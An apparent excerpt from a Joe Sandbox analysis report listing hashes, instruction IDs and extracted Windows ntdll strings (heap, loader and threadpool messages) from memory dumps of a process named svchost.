                                                                    • Opcode ID: 3f92e90386514af08ddc7fb8094cfcd8ed3a6fb3ea4eaeaa9220205d0e8c9b5c
                                                                    • Instruction ID: 48ad3f04e95aa9f15e5477e81f532a03dd8350181c4e8e3035963fd1a054a76c
                                                                    • Opcode Fuzzy Hash: 3f92e90386514af08ddc7fb8094cfcd8ed3a6fb3ea4eaeaa9220205d0e8c9b5c
                                                                    • Instruction Fuzzy Hash: 18C17A75188382DFCB12DF18C448BAAB7E4BF84719F00A96AF9D58B350E734C985CB52
                                                                    Strings
                                                                    • LdrpInitializeProcess, xrefs: 02E68422
                                                                    • minkernel\ntdll\ldrinit.c, xrefs: 02E68421
                                                                    • @, xrefs: 02E68591
                                                                    • \Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers, xrefs: 02E6855E
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.2155609002.0000000002E00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E00000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_2e00000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: @$LdrpInitializeProcess$\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers$minkernel\ntdll\ldrinit.c
                                                                    • API String ID: 0-1918872054
                                                                    • Opcode ID: 38adeaf954d68e0fa564811f72716a76b850dae34892930c34d3517b24c16d03
                                                                    • Instruction ID: 7015b2b73cd78deaee45bcbb7802061b9eb9287f0a9a9605ca0bbea8dba141a3
                                                                    • Opcode Fuzzy Hash: 38adeaf954d68e0fa564811f72716a76b850dae34892930c34d3517b24c16d03
                                                                    • Instruction Fuzzy Hash: 3F919E715C8344AFE721DB21C894FBBB7E9EB84788F40A92DFA8496150D734D948CB62
                                                                    Strings
                                                                    • HEAP[%wZ]: , xrefs: 02E954D1, 02E95592
                                                                    • ((FreeBlock->Flags & HEAP_ENTRY_DECOMMITTED) || (ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock)), xrefs: 02E954ED
                                                                    • ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock, xrefs: 02E955AE
                                                                    • HEAP: , xrefs: 02E954E0, 02E955A1
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.2155609002.0000000002E00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E00000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_2e00000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: ((FreeBlock->Flags & HEAP_ENTRY_DECOMMITTED) || (ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock))$HEAP: $HEAP[%wZ]: $ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock
                                                                    • API String ID: 0-1657114761
                                                                    • Opcode ID: 660be084e2d075e57df5127eddf263168d7d21ead8a9bb235ce422ccabaee614
                                                                    • Instruction ID: 8ddbd62ec6ba206d6d230a00c707b975dd77aa77d93fd331402796c5c9b5c14d
                                                                    • Opcode Fuzzy Hash: 660be084e2d075e57df5127eddf263168d7d21ead8a9bb235ce422ccabaee614
                                                                    • Instruction Fuzzy Hash: CBA1F270684605DFDB29CF24D440BBAB7F1BF45308F14E539E58A8B682DB31A948CB91
                                                                    Strings
                                                                    • RtlpGetActivationContextDataStorageMapAndRosterHeader, xrefs: 02EA21D9, 02EA22B1
                                                                    • SXS: %s() passed the empty activation context, xrefs: 02EA21DE
                                                                    • .Local, xrefs: 02E628D8
                                                                    • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p, xrefs: 02EA22B6
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.2155609002.0000000002E00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E00000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_2e00000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: .Local$RtlpGetActivationContextDataStorageMapAndRosterHeader$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p$SXS: %s() passed the empty activation context
                                                                    • API String ID: 0-1239276146
                                                                    • Opcode ID: 536fd3e2078166d995e862e7e8828fd29607ae2fbde0c99798f4b38a9434d249
                                                                    • Instruction ID: 5d78a8a777b437c634d7f8fc0409a4c193c113029132535b0c90b821ebf3efcd
                                                                    • Opcode Fuzzy Hash: 536fd3e2078166d995e862e7e8828fd29607ae2fbde0c99798f4b38a9434d249
                                                                    • Instruction Fuzzy Hash: 42A1A3319C0229DBDB24CF54DC88BA9B3B1BF58358F1595E9DE48AB251D730AE80CF90
                                                                    Strings
                                                                    • SXS: %s() called with invalid cookie type 0x%08Ix, xrefs: 02EA3437
                                                                    • SXS: %s() called with invalid flags 0x%08lx, xrefs: 02EA342A
                                                                    • RtlDeactivateActivationContext, xrefs: 02EA3425, 02EA3432, 02EA3451
                                                                    • SXS: %s() called with invalid cookie tid 0x%08Ix - should be %08Ix, xrefs: 02EA3456
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.2155609002.0000000002E00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E00000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_2e00000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: RtlDeactivateActivationContext$SXS: %s() called with invalid cookie tid 0x%08Ix - should be %08Ix$SXS: %s() called with invalid cookie type 0x%08Ix$SXS: %s() called with invalid flags 0x%08lx
                                                                    • API String ID: 0-1245972979
                                                                    • Opcode ID: 89c2d8a606b1eb7ba8921b0bb56171afdccbd2e3600493c978f3ae3b7d80fb63
                                                                    • Instruction ID: 26eda9fe6c2231fffea43766985fd9f78705fef8a127f66817ace2b45a0d222b
                                                                    • Opcode Fuzzy Hash: 89c2d8a606b1eb7ba8921b0bb56171afdccbd2e3600493c978f3ae3b7d80fb63
                                                                    • Instruction Fuzzy Hash: A161F4726C07129BD732CF18C855B7AB3A6EF80B98F54D569F8559F280D730E801CB91
                                                                    Strings
                                                                    • ThreadPool: callback %p(%p) returned with a transaction uncleared, xrefs: 02E90FE5
                                                                    • ThreadPool: callback %p(%p) returned with background priorities set, xrefs: 02E910AE
                                                                    • ThreadPool: callback %p(%p) returned with the loader lock held, xrefs: 02E91028
                                                                    • ThreadPool: callback %p(%p) returned with preferred languages set, xrefs: 02E9106B
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.2155609002.0000000002E00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E00000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_2e00000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: ThreadPool: callback %p(%p) returned with a transaction uncleared$ThreadPool: callback %p(%p) returned with background priorities set$ThreadPool: callback %p(%p) returned with preferred languages set$ThreadPool: callback %p(%p) returned with the loader lock held
                                                                    • API String ID: 0-1468400865
                                                                    • Opcode ID: 3310db018da1c069525116b9ff279a1ffb7921195d8a3f3ac8f1db952d0f7bc9
                                                                    • Instruction ID: 0bce789eb8344d7b327b1638393239231d135502c9edb1571bc0f8ba7cf05616
                                                                    • Opcode Fuzzy Hash: 3310db018da1c069525116b9ff279a1ffb7921195d8a3f3ac8f1db952d0f7bc9
                                                                    • Instruction Fuzzy Hash: 4471E272984304AFCB21DF24C888B977BADAF44764F40A869FE498B146D734D588CFD2
                                                                    Strings
                                                                    • LdrpDynamicShimModule, xrefs: 02E9A998
                                                                    • minkernel\ntdll\ldrinit.c, xrefs: 02E9A9A2
                                                                    • apphelp.dll, xrefs: 02E52462
                                                                    • Getting ApphelpCheckModule failed with status 0x%08lx, xrefs: 02E9A992
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.2155609002.0000000002E00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E00000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_2e00000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: Getting ApphelpCheckModule failed with status 0x%08lx$LdrpDynamicShimModule$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                                    • API String ID: 0-176724104
                                                                    • Opcode ID: c74040b31d0c50a259d6df4c6607b8f0a4e70bf728d00c77e203d6a085b303e4
                                                                    • Instruction ID: dbaf36e1e1f2d904e9dfeb55dfcc640ec61699aef69bea44a9072bf7621b5f60
                                                                    • Opcode Fuzzy Hash: c74040b31d0c50a259d6df4c6607b8f0a4e70bf728d00c77e203d6a085b303e4
                                                                    • Instruction Fuzzy Hash: 57314871EC0204ABDF309F589845FAAB7B5FF81748F26946AFD01AB340C7B09995CB40
                                                                    Strings
                                                                    • HEAP[%wZ]: , xrefs: 02E43255
                                                                    • Unable to release memory at %p for %Ix bytes - Status == %x, xrefs: 02E4327D
                                                                    • HEAP: , xrefs: 02E43264
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: HEAP: $HEAP[%wZ]: $Unable to release memory at %p for %Ix bytes - Status == %x
                                                                    • API String ID: 0-617086771
                                                                    Strings
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: """"$MitigationAuditOptions$MitigationOptions
                                                                    • API String ID: 0-1670051934
                                                                    Strings
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: (UCRBlock->Size >= *Size)$HEAP: $HEAP[%wZ]:
                                                                    • API String ID: 0-4253913091
                                                                    Strings
                                                                    • HEAP[%wZ]: , xrefs: 02E31712
                                                                    • HEAP: Free Heap block %p modified at %p after it was freed, xrefs: 02E31728
                                                                    • HEAP: , xrefs: 02E31596
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: HEAP: $HEAP: Free Heap block %p modified at %p after it was freed$HEAP[%wZ]:
                                                                    • API String ID: 0-3178619729
                                                                    Strings
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: $@
                                                                    • API String ID: 0-1077428164
                                                                    Strings
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: FilterFullPath$UseFilter$\??\
                                                                    • API String ID: 0-2779062949
                                                                    Strings
                                                                    • Failed to allocated memory for shimmed module list, xrefs: 02E9A10F
                                                                    • minkernel\ntdll\ldrinit.c, xrefs: 02E9A121
                                                                    • LdrpCheckModule, xrefs: 02E9A117
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: Failed to allocated memory for shimmed module list$LdrpCheckModule$minkernel\ntdll\ldrinit.c
                                                                    • API String ID: 0-161242083
                                                                    Strings
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: ((PHEAP_ENTRY)LastKnownEntry <= Entry)$HEAP: $HEAP[%wZ]:
                                                                    • API String ID: 0-1334570610
                                                                    Strings
                                                                    • HEAP[%wZ]: , xrefs: 02EDDC12
                                                                    • Heap block at %p modified at %p past requested size of %Ix, xrefs: 02EDDC32
                                                                    • HEAP: , xrefs: 02EDDC1F
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: HEAP: $HEAP[%wZ]: $Heap block at %p modified at %p past requested size of %Ix
                                                                    • API String ID: 0-3815128232
                                                                    Strings
                                                                    • minkernel\ntdll\ldrinit.c, xrefs: 02EA82E8
                                                                    • LdrpInitializePerUserWindowsDirectory, xrefs: 02EA82DE
                                                                    • Failed to reallocate the system dirs string !, xrefs: 02EA82D7
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: Failed to reallocate the system dirs string !$LdrpInitializePerUserWindowsDirectory$minkernel\ntdll\ldrinit.c
                                                                    • API String ID: 0-1783798831
                                                                    Strings
                                                                    • @, xrefs: 02EEC1F1
                                                                    • \Registry\Machine\System\CurrentControlSet\Control\MUI\Settings, xrefs: 02EEC1C5
                                                                    • PreferredUILanguages, xrefs: 02EEC212
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: @$PreferredUILanguages$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings
                                                                    • API String ID: 0-2968386058
                                                                    Strings
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: @$LdrpResValidateFilePath Enter$LdrpResValidateFilePath Exit
                                                                    • API String ID: 0-1373925480
                                                                    Strings
                                                                    • LdrpCheckRedirection, xrefs: 02EB488F
                                                                    • minkernel\ntdll\ldrredirect.c, xrefs: 02EB4899
                                                                    • Import Redirection: %wZ %wZ!%s redirected to %wZ, xrefs: 02EB4888
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: Import Redirection: %wZ %wZ!%s redirected to %wZ$LdrpCheckRedirection$minkernel\ntdll\ldrredirect.c
                                                                    • API String ID: 0-3154609507
                                                                    Strings
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: (ROUND_UP_TO_POWER2(Size, PAGE_SIZE) == Size)$HEAP: $HEAP[%wZ]:
                                                                    • API String ID: 0-2558761708
                                                                    Strings
                                                                    • Process initialization failed with status 0x%08lx, xrefs: 02EB20F3
                                                                    • LdrpInitializationFailure, xrefs: 02EB20FA
                                                                    • minkernel\ntdll\ldrinit.c, xrefs: 02EB2104
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: LdrpInitializationFailure$Process initialization failed with status 0x%08lx$minkernel\ntdll\ldrinit.c
                                                                    • API String ID: 0-2986994758
                                                                    APIs
                                                                    Strings
                                                                    Similarity
                                                                    • API ID: ___swprintf_l
                                                                    • String ID: #%u
                                                                    • API String ID: 48624451-232158463
                                                                    APIs
                                                                    • @_EH4_CallFilterFunc@8.LIBCMT ref: 02EBCFBD
                                                                    Strings
                                                                    Similarity
                                                                    • API ID: CallFilterFunc@8
                                                                    • String ID: @
                                                                    • API String ID: 4062629308-2766056989
                                                                    Strings
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: @$@
                                                                    • API String ID: 0-149943524
                                                                    Strings
                                                                    • LdrResSearchResource Exit, xrefs: 02E3AA25
                                                                    • LdrResSearchResource Enter, xrefs: 02E3AA13
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: LdrResSearchResource Enter$LdrResSearchResource Exit
                                                                    • API String ID: 0-4066393604
                                                                    • Opcode ID: 91800912f6a470bc739ab2a186ee21e14756f2ad25e36bf09f7126b5ddd1f0b0
                                                                    • Instruction ID: 541fe9ac939af3a6100eb720402457c12522f50314150524914b79be70de8f0e
                                                                    • Opcode Fuzzy Hash: 91800912f6a470bc739ab2a186ee21e14756f2ad25e36bf09f7126b5ddd1f0b0
                                                                    • Instruction Fuzzy Hash: 81E18371E80218ABDF22CE95C998BEEB7BAAF44319F10A076FD41E7350D7349981CB50
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.2155609002.0000000002E00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E00000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_2e00000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: `$`
                                                                    • API String ID: 0-197956300
                                                                    • Opcode ID: f14427897cfa9f2fff493575096aafbbc27a418cd5181fa4476e78ff72e31fcd
                                                                    • Instruction ID: 9976abe3b2676b94c8f33e4864a578d43fb14edf2c9c79c23ed345ef1ae11078
                                                                    • Opcode Fuzzy Hash: f14427897cfa9f2fff493575096aafbbc27a418cd5181fa4476e78ff72e31fcd
                                                                    • Instruction Fuzzy Hash: A1C1BF312843429BDB64CF24C841B6BBBE6BFC4358F089A3DFA998A390D775D505CB52
                                                                    Strings
                                                                    • Failed to retrieve service checksum., xrefs: 02E8EE56
                                                                    • ResIdCount less than 2., xrefs: 02E8EEC9
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.2155609002.0000000002E00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E00000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_2e00000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: Failed to retrieve service checksum.$ResIdCount less than 2.
                                                                    • API String ID: 0-863616075
                                                                    • Opcode ID: 02af49e51bb1b9048032d728be36a37ec0da4cbcb4e964e6f868a1c01e0d730c
                                                                    • Instruction ID: cf05e26529d5f032d1947140acab394746b891afcf7950a131720ecc5a0614ad
                                                                    • Opcode Fuzzy Hash: 02af49e51bb1b9048032d728be36a37ec0da4cbcb4e964e6f868a1c01e0d730c
                                                                    • Instruction Fuzzy Hash: 18E1F2B19483849FE325CF15C440BABBBE4BB89315F408A2EF5DD9B280DB719909CF56
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.2147046823.0000000002410000.00000040.80000000.00040000.00000000.sdmp, Offset: 02410000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_2410000_svchost.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: VUUU$gfff
                                                                    • API String ID: 0-2662692612
                                                                    • Opcode ID: d4f1915c3985d83dc7671641e112b786d3ad93b35d1ed91f35229a768e1bfe5a
                                                                    • Instruction ID: 1a34f45f925a347cd6f28320cc5517b720076150f670d8299a814d6d7376d3c6
                                                                    • Opcode Fuzzy Hash: d4f1915c3985d83dc7671641e112b786d3ad93b35d1ed91f35229a768e1bfe5a
                                                                    • Instruction Fuzzy Hash: 9A71D636B005298BCB18CE6DDDE066E73A2EBD4314F28817BDD19CF391E671DD158680
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.2155609002.0000000002E00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E00000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_2e00000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID: InitializeThunk
                                                                    • String ID: Legacy$UEFI
                                                                    • API String ID: 2994545307-634100481
                                                                    • Opcode ID: e08a4304d3e529cc612c650cdc22b582a98920c20fa1e37f3e4521050689d894
                                                                    • Instruction ID: 46c24c9c0617e9cdeef05e09430985b37df06cbc45d264a71eae53857d2bf1ec
                                                                    • Opcode Fuzzy Hash: e08a4304d3e529cc612c650cdc22b582a98920c20fa1e37f3e4521050689d894
                                                                    • Instruction Fuzzy Hash: FE613B71E807189FDB14DFA8C890BAEBBB5FB44704F18907DE659EB291D731A940CB50
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.2155609002.0000000002E00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E00000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_2e00000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: @$MUI
                                                                    • API String ID: 0-17815947
                                                                    • Opcode ID: 0e7cffa69f73cc35b62c80392802b1c7ed65341cca56840a5f64dde6d1f51fda
                                                                    • Instruction ID: 83c0c7bd4c9dad997a62e0d093b03037e3fc11b55988ad2b2d48361340a45608
                                                                    • Opcode Fuzzy Hash: 0e7cffa69f73cc35b62c80392802b1c7ed65341cca56840a5f64dde6d1f51fda
                                                                    • Instruction Fuzzy Hash: 05513A71D8021DAEDF11DFA5CC90AEEBBB9EB44758F109529EA11B7280D7309E46CF60
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.2147046823.0000000002410000.00000040.80000000.00040000.00000000.sdmp, Offset: 02410000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_2410000_svchost.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: VUUU$gfff
                                                                    • API String ID: 0-2662692612
                                                                    • Opcode ID: 5af0f4dd734a2749e51f9c24693fac382f5a48117ed694ee5256177a90eadd1e
                                                                    • Instruction ID: 95b1f815a7029c5fdb4e8dfd4c1a06ef4558acfb41384162bc0c94305ee9c915
                                                                    • Opcode Fuzzy Hash: 5af0f4dd734a2749e51f9c24693fac382f5a48117ed694ee5256177a90eadd1e
                                                                    • Instruction Fuzzy Hash: 8151D376B005198BCB18CE6DCDE16AA77A2EFD4314B69827ADC19CF391E670DD01CB80
                                                                    Strings
                                                                    • TerminalServices-RemoteConnectionManager-AllowAppServerMode, xrefs: 02E3063D
                                                                    • kLsE, xrefs: 02E30540
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.2155609002.0000000002E00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E00000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_2e00000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: TerminalServices-RemoteConnectionManager-AllowAppServerMode$kLsE
                                                                    • API String ID: 0-2547482624
                                                                    • Opcode ID: 493ac370353e9ae98433647cc212c7f9d40453e6750cdf32d3a2c60d7968a8d9
                                                                    • Instruction ID: 3c2fa3e50440621622c7fe121495bec27e55adb4a28427386c3fbfc2e52d759b
                                                                    • Opcode Fuzzy Hash: 493ac370353e9ae98433647cc212c7f9d40453e6750cdf32d3a2c60d7968a8d9
                                                                    • Instruction Fuzzy Hash: 4351BE725847429FC729EF64C4487A7B7E4AF85309F00E83EE9AA87640E770D545CF92
                                                                    Strings
                                                                    • RtlpInsertAssemblyStorageMapEntry, xrefs: 02EA2807
                                                                    • SXS: %s() bad parametersSXS: Map : %pSXS: AssemblyRosterIndex : 0x%lxSXS: Map->AssemblyCount : 0x%lxSXS: StorageLocation : %pSXS: StorageLocation->Length: 0x%xSXS: StorageLocation->Buffer: %pSXS: OpenDirectoryHand, xrefs: 02EA280C
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.2155609002.0000000002E00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E00000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_2e00000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: RtlpInsertAssemblyStorageMapEntry$SXS: %s() bad parametersSXS: Map : %pSXS: AssemblyRosterIndex : 0x%lxSXS: Map->AssemblyCount : 0x%lxSXS: StorageLocation : %pSXS: StorageLocation->Length: 0x%xSXS: StorageLocation->Buffer: %pSXS: OpenDirectoryHand
                                                                    • API String ID: 0-2104531740
                                                                    • Opcode ID: e50090eff8e44504045ec94df53b05ee9597dcb54997799ca31f76298d7dbd81
                                                                    • Instruction ID: 8ed149bcf9abf78639c20613121a3f5b0df24986c4151a0da98735e6270234bf
                                                                    • Opcode Fuzzy Hash: e50090eff8e44504045ec94df53b05ee9597dcb54997799ca31f76298d7dbd81
                                                                    • Instruction Fuzzy Hash: 9741DE36680601AFD724DF55C850ABAB7B6EF94B58F20D029FE45AF640D730EE41CBA0
                                                                    Strings
                                                                    • RtlpResUltimateFallbackInfo Enter, xrefs: 02E3A2FB
                                                                    • RtlpResUltimateFallbackInfo Exit, xrefs: 02E3A309
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.2155609002.0000000002E00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E00000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_2e00000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: RtlpResUltimateFallbackInfo Enter$RtlpResUltimateFallbackInfo Exit
                                                                    • API String ID: 0-2876891731
                                                                    • Opcode ID: e0293476473e0cb04c4d4c2a8be70603ea12dcaf2f54947e54e74a18f23082b0
                                                                    • Instruction ID: ee752e1e7c710c8591d436d03c7424bc70af691c6252a2e685c408129d84af26
                                                                    • Opcode Fuzzy Hash: e0293476473e0cb04c4d4c2a8be70603ea12dcaf2f54947e54e74a18f23082b0
                                                                    • Instruction Fuzzy Hash: B841AE30A80645DBCF228F69C898BAE77F4EF45309F24D0A6E940DB391E735D980CB40
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.2155609002.0000000002E00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E00000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_2e00000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID: InitializeThunk
                                                                    • String ID: Cleanup Group$Threadpool!
                                                                    • API String ID: 2994545307-4008356553
                                                                    • Opcode ID: 11d85ce83f73f7d7c86a9442208e0b84cf9dc499248661b60f92871633f6c165
                                                                    • Instruction ID: 99c31f6542785482257739bdf0acd91f72bd9bc194094696db8976eec8fef346
                                                                    • Opcode Fuzzy Hash: 11d85ce83f73f7d7c86a9442208e0b84cf9dc499248661b60f92871633f6c165
                                                                    • Instruction Fuzzy Hash: 4E01D1B2AC0744AFE321DF14CD49B2A77E8E744759F01D939B658CB290E334D804CB46
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.2155609002.0000000002E00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E00000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_2e00000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: MUI
                                                                    • API String ID: 0-1339004836
                                                                    • Opcode ID: af61050a8b6a276267cebf36aab2a7f9d6cc370dbe09f7ec86d5d4739d4fe74a
                                                                    • Instruction ID: cecbf5de7952ac35c97bc30d131ced3105c9a6c366a6f5b4afff7281c41e1fb0
                                                                    • Opcode Fuzzy Hash: af61050a8b6a276267cebf36aab2a7f9d6cc370dbe09f7ec86d5d4739d4fe74a
                                                                    • Instruction Fuzzy Hash: 29826C75E402188FDB26CFA9C8887EDB7B5BF48719F24E16AE819AB250D7309D41CF50
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.2155609002.0000000002E00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E00000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_2e00000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: P`vRbv
                                                                    • API String ID: 0-2392986850
                                                                    • Opcode ID: 953e986502eb675bbc9c4f5af46e4b1194d3523d01e25d583e90487fb60e75b8
                                                                    • Instruction ID: 7a73a5216d7f1722d846d498b92e0b1253f7f6b98fd584e372bac03e7b0756d0
                                                                    • Opcode Fuzzy Hash: 953e986502eb675bbc9c4f5af46e4b1194d3523d01e25d583e90487fb60e75b8
                                                                    • Instruction Fuzzy Hash: 5B422671D84259AEDF29FBA8D8447FDBBB1AF04B18F14E09AE4DDA7280D7348941CB50
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.2155609002.0000000002E00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E00000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_2e00000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: @
                                                                    • API String ID: 0-2766056989
                                                                    • Opcode ID: a62076708d3ed8f09253c3cd3ba277d89f510b56d554c4357fdc89bf54a91837
                                                                    • Instruction ID: ce5c9a8679a9a2dc70a1aec45e8245d96b31126040b5627d5704cdf7dc3cdf7e
                                                                    • Opcode Fuzzy Hash: a62076708d3ed8f09253c3cd3ba277d89f510b56d554c4357fdc89bf54a91837
                                                                    • Instruction Fuzzy Hash: 8E621870D012188FCB98DF9AC4D4AADB7B2FF8C311F70819AE9816B745C7356A16CB60
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.2155609002.0000000002E00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E00000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_2e00000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: 0
                                                                    • API String ID: 0-4108050209
                                                                    • Opcode ID: 5a16f5c0ec510b12912f7e58da06db4656a4b1be3b1f9d131f285691ec55c679
                                                                    • Instruction ID: c09cfbea51f4966f7a879766022fc418743ea5f23014392a76a0b4e5e1b2e299
                                                                    • Opcode Fuzzy Hash: 5a16f5c0ec510b12912f7e58da06db4656a4b1be3b1f9d131f285691ec55c679
                                                                    • Instruction Fuzzy Hash: B3F1AF71694751CFCB25CF24C580B6AB7E1AF88758F14E8ADFD8997240DB30D845CB62
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.2147046823.0000000002410000.00000040.80000000.00040000.00000000.sdmp, Offset: 02410000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_2410000_svchost.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: (
                                                                    • API String ID: 0-3887548279
                                                                    • Opcode ID: 5b5895f0e51fce406fdbb92f5fe0f57fd39733701dba8a51bdd5afbf1107f5ef
                                                                    • Instruction ID: f47676c00e9ac9a30665caf35b9e0b1fdbb829009c095a7a85ec56ac15322e71
                                                                    • Opcode Fuzzy Hash: 5b5895f0e51fce406fdbb92f5fe0f57fd39733701dba8a51bdd5afbf1107f5ef
                                                                    • Instruction Fuzzy Hash: 79021DB6E006189FDB54CF9AC8805DDFBF2FF88314F1AC1AAD859A7315D6746A418F80
                                                                    Strings
                                                                    Memory Dump Source
